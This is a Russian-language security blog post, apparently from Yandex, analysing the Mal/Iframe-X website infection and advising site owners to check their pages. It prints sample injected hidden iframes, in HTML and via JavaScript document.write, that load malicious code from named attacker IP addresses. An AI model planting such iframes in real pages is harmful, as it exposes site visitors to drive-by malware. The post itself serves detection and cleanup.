GrabDuck

Вредоносный фрейм Mal/Iframe-X — Блог о безопасности

:

В последнее время наша система существенно чаще, чем обычно, находит сайты с вредоносным кодом, который относится к Mal/Iframe-X по классификации компании Sophos. Динамика числа уникальных хостов, заражённых данным вредоносным кодом, выглядит так:

Признаком заражения страницы Mal/Iframe-X является обнаружение в DOM тега IFRAME, в который загружается браузерный вредоносный код. Примерно в 75% случаев это происходит при прописывании этого тега непосредственно в HTML-коде страницы, в оставшихся 25% – при выполнении в контексте браузера специального JavaScript-файла, который дописывает тег в код страницы.


  • Пример вредоносного кода в HTML-страницах:


    <iframe frameborder=0 src="http://64.247.185.149/Home/index.php" width=1 height=1 scrolling=no>

  • Пример вредоносного кода в JavaScript-файлах:


    document.write('<iframe frameborder=0 src="http://65.75.160.235/Home/index.php" width=1 height=1 scrolling=no>)

  • В атрибуте SRC вредоносного IFRAME практически всегда содержится URL вида:


    http://IP_ADDRESS/Home/index.php

    где IP_ADDRESS - это IP-адрес сервера злоумышленников, с которого подгружается основная часть  вредоносного кода.


Как видно из графика ниже, особой популярностью у злоумышленников, распространяющих  код Mal/Iframe-X, пользуются сайты в доменной зоне COM. Доли доменных зон выглядят следующим образом:

Для распространения основной части вредоносного кода злоумышленники используют серверы с различными IP-адресами, но примерно в четверти случаев это IP-адрес 64.247.185.149&. Доли серверов злоумышленников, которые участвуют в заражении, выглядят следующим образом:

Упрощённая схема работы Mal/Iframe-X выглядит так:


Рекомендации

Рекомендуем вам проверить, нет ли на страницах ваших сайтов подобного вредоносного кода. Если вы не знаете, является ли ваш сайт источником распространения вредоносного кода, или о сайте известно, что он заражён, но непонятно, что это за вредоносный код и как от него избавиться – вы можете зарегистрироваться на сервисе Яндекс.Вебмастер, с помощью которого можно посмотреть детальную информацию о заражении, рекомендации по его лечению, а также запустить внеочередную перепроверку сайта.

Дополнительная информация о том, как обезопасить сайт и компьютер в интернете, содержится в статьях: